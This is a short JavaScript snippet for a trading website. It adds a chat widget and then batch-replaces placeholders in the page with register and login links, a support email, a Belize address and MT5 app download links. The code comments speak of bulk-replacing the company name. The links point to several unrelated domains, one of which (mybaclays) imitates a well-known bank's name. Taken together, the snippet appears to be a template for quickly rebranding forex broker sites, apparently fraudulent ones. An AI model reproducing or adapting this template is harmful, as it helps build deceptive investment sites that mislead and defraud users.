var chat_ = function () {

    var br_ = document.createElement("div")
    br_.style.height = "20px";



    var div_ = document.createElement("div")
    div_.style.position = "fixed";
    div_.style.right = "20px";
    div_.style.bottom = "20px";
    div_.style["z-index"] = "99999999";

    var a_ = document.createElement("a");
    a_["href"] = "https://go.crisp.chat/chat/embed/?website_id=ca9ddcdd-cd74-4d57-b945-b770a377b495";
    var img_ = document.createElement("img");
    img_.style.width = "60px";
    img_.src = "static/kefu.png";
    img_.alt = "";
    a_.append(img_)

    div_.append(a_);
    document.body.append(div_);

    console.log("2")

    var doc_ = document.documentElement.innerHTML;
    // 批量替换公司名
    //Stpitrv
    //<p class="regulate"> 监管放这里

    var doc_ = doc_.replace(/\?reg/g,"https://user.stpitrv.cc/register")
    var doc_ = doc_.replace(/\?login/g,"https://user.stpitrv.cc/login")
    var doc_ = doc_.replace(/\?mtmt/g,"MT5")
    var doc_ = doc_.replace(/\?email/g,"support@phyxfxltd.cc")
    var doc_ = doc_.replace(/\?pc/g,"https://user.stpitrv.cc/login")
    var doc_ = doc_.replace(/\?ios/g,"https://m.mybaclays.com/mt5")
    var doc_ = doc_.replace(/\?apk/g,"https://m.mybaclays.com/mt5")
    var doc_ = doc_.replace(/\?addr/g,"Suite 404, The Matalon, Coney Drive, Belize City, Belize")
    document.body.innerHTML =doc_
}()